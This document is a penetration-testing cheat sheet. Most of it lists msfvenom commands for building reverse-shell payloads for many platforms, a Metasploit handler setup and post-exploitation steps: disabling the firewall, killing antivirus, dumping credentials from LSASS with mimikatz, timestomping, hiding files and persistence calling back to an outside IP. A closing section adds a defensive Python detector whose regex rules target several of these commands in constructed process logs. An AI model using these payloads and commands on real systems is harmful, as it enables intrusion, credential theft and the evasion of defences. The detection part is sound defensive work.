List payloads
I. Binaries
Linux
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f elf > shell.elf

Windows
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe > shell.exe

Mac
msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f macho > shell.macho
II. Web Payloads
PHP
msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT= -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php

ASP
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f asp > shell.asp

JSP
msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f raw > shell.jsp

WAR
msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f war > shell.war
III. Scripting Payloads
Python
msfvenom -p cmd/unix/reverse_python LHOST= LPORT= -f raw > shell.py

Bash
msfvenom -p cmd/unix/reverse_bash LHOST= LPORT= -f raw > shell.sh

Perl
msfvenom -p cmd/unix/reverse_perl LHOST= LPORT= -f raw > shell.pl

For all shellcode, see 'msfvenom --help-formats' for the list of valid output formats. Given a language format, msfvenom emits the shellcode as a literal that can be pasted directly into source code in that language.
IV. Shellcode
Linux Based Shellcode
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f

Windows Based Shellcode
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f

Mac Based Shellcode
msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f
V. Handlers
Metasploit handlers are the quickest way to put Metasploit in a position to receive
your incoming shells. A handler should take the following form (one command per line,
as typed into msfconsole or placed in a resource script):
use exploit/multi/handler
set PAYLOAD
set LHOST
set LPORT
set ExitOnSession false
exploit -j -z
Meterpreter Useful Commands:
download c:\\windows\\repair\\sam /tmp
execute -f c:\\windows\\temp\\exploit.exe
portfwd add -l 3389 -p 3389 -r target
portfwd delete -l 3389 -p 3389 -r target
Additional useful commands are as follows:
- msfconsole -r unicorn.rb
- meterpreter shell
- getsid
- getuid
- migrate
- getsystem
- run killav
- run checkvm
- exploit Windows7 Service Pack 1 msp
- use incognito
- run countermeasure
- run countermeasure -d -k
- shell
- netsh firewall set opmode disable //disable firewall
- run vnc
- load mimikatz
- ls
- upload /home/user/mimikatz.exe C:\\
- timestomp mimikatz.exe -f "C:\\Windows\\System32\\cmd.exe"
- shell
- mimikatz.exe
- privilege::debug
- inject::process lsass.exe sekurlsa.dll
- getLogonPasswords
- sekurlsa::logonPasswords full
- run persistence -A -L C:\\ -X -i 10 -p 443 -r 192.168.0.196
- attrib +h c:\autoexec.bat //make it hidden
- Priv Esc Exploit CVE-2014-4113 (ms14_058_track_popup_menu)
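From the defender's side, here is an added example (not part of the cheat sheet) showing how the host-side commands in the list above (netsh disabling the firewall, attrib +h hiding a file, mimikatz modules on a command line) can be caught in process-creation telemetry. The log lines are constructed, the flattened key=value layout and its field names (host, user, pid, image, cmdline) are assumptions made for this example rather than a real Sysmon or 4688 schema, and the rules are starting-point heuristics:

```python
"""Added example (not from the cheat sheet above): detection logic for the
host-side commands it lists, run over constructed process-creation log lines.
The flattened key=value layout and field names (host, user, pid, image,
cmdline) are assumptions for this example, not a real Sysmon/4688 schema."""
import re

# One flattened record per line; cmdline is the only field that may contain spaces.
LINE_RE = re.compile(
    r'^(?P<ts>\S+)\s+host=(?P<host>\S+)\s+user=(?P<user>\S+)\s+pid=(?P<pid>\d+)\s+'
    r'image=(?P<image>\S+)\s+cmdline="(?P<cmdline>[^"]*)"\s*$'
)

# Rule name -> pattern over the command line. Each pattern targets a command from
# the "Additional useful commands" list; they are heuristics and need tuning
# against an environment's own baseline.
RULES = {
    # "netsh firewall set opmode disable" (legacy syntax) or "netsh advfirewall ... state off"
    "firewall_disabled_netsh": re.compile(
        r"\bnetsh\b.*\b(adv)?firewall\b.*\b(opmode\s+disable|state\s+off)\b", re.I),
    # "attrib +h <file>": hiding a dropped file
    "hidden_attribute_set": re.compile(r"\battrib\b.*\+h\b", re.I),
    # mimikatz modules passed on the command line (batch-mode use)
    "mimikatz_credential_access": re.compile(
        r"(privilege::debug|sekurlsa::logonpasswords|inject::process\s+lsass\.exe)", re.I),
}

# Constructed sample log: three lines that should fire, two that should not.
SAMPLE_LOG = [
    '2024-05-01T10:22:13Z host=WS01 user=CORP\\jdoe pid=4120 image=C:\\Windows\\System32\\netsh.exe cmdline="netsh firewall set opmode disable"',
    '2024-05-01T10:22:40Z host=WS01 user=CORP\\jdoe pid=4133 image=C:\\Windows\\System32\\attrib.exe cmdline="attrib +h c:\\autoexec.bat"',
    '2024-05-01T10:23:02Z host=WS01 user=CORP\\jdoe pid=4150 image=C:\\Users\\jdoe\\AppData\\Local\\Temp\\mimikatz.exe cmdline="mimikatz.exe privilege::debug sekurlsa::logonPasswords exit"',
    '2024-05-01T10:25:11Z host=WS01 user=CORP\\jdoe pid=4171 image=C:\\Windows\\System32\\netsh.exe cmdline="netsh interface ipv4 show config"',
    '2024-05-01T10:26:30Z host=WS01 user=CORP\\jdoe pid=4188 image=C:\\Windows\\System32\\attrib.exe cmdline="attrib -h c:\\temp\\notes.txt"',
]


def parse_line(line):
    """Return the record as a dict, or None if the line does not fit the layout."""
    m = LINE_RE.match(line)
    return m.groupdict() if m else None


def scan(lines):
    """Return (findings, skipped): findings is a list of
    (line_no, rule, user, cmdline) for every rule that fires on a record;
    skipped counts unparseable lines so a telemetry gap is visible rather
    than silently read as 'nothing happened'."""
    findings, skipped = [], 0
    for n, line in enumerate(lines, 1):
        rec = parse_line(line)
        if rec is None:
            skipped += 1
            continue
        for rule, pattern in RULES.items():
            if pattern.search(rec["cmdline"]):
                findings.append((n, rule, rec["user"], rec["cmdline"]))
    return findings, skipped


if __name__ == "__main__":
    hits, unparsed = scan(SAMPLE_LOG)
    for n, rule, user, cmdline in hits:
        print(f"line {n}: {rule} by {user}: {cmdline}")
    print(f"{len(hits)} finding(s), {unparsed} unparseable line(s)")
```

Note that the cheat sheet runs mimikatz interactively (the modules are typed at its prompt), which leaves nothing on the process command line for the third rule to match; that rule only covers batch-mode invocation, and the LSASS memory access itself is what a Sysmon Event ID 10 (ProcessAccess) rule would observe.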